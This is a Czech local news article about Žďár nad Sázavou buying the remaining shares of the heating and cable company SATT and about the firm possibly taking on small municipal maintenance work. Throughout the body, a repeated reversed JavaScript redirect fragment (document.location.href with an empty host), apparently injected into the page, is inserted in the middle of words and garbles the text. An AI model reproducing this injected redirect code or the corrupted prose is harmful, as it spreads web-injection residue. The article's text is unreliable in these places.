Rainbow page separator

Žďár se SATTem počítá při zajištění práce technických služeb

Čtvrtek, 5. prosince 2019

Peníze, papírové bankovky

Žďár nad Sázavou / Od začátku příštího roku se s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toprocentním majitelem akcií žďárské společnosti SATT stane Žďár nad Sázavou a při té příleži[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tosti zástupci radnice zvažují, že firma by mohla ve městě zajišťovat také činnost „malých“ technických služeb. Jedná se o drobné úpravy veřejného pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toru či zeleně a některé úklidové práce, dojít by k [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu mělo postupně. Firma SATT se zabývá rozvodem tepla po městě a posky[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];továním televizního a interne[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tového vysílání v části žďárského okresu.
Žďár zbývajících 38,3 procenta akcií společnosti SATT získá s účinnosti od 1. ledna 2020 za 80,5 milionu korun se splatností sedm let od Nového Města na Moravě, přičemž ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to balík akcií zahrnuje i podíl Velkého Meziříčí a Dolní Rožínky, jenž byl sloučen s novoměstskými akciemi.
První splátka Novému Městu bude pro Žďár, který dosud vlastní 61,7 procenta akcií SATTu, k 1. červnu příštího roku a následně pak ještě bude následovat dalších šest let splácení ve výši zhruba 11,5 milionu korun ročně.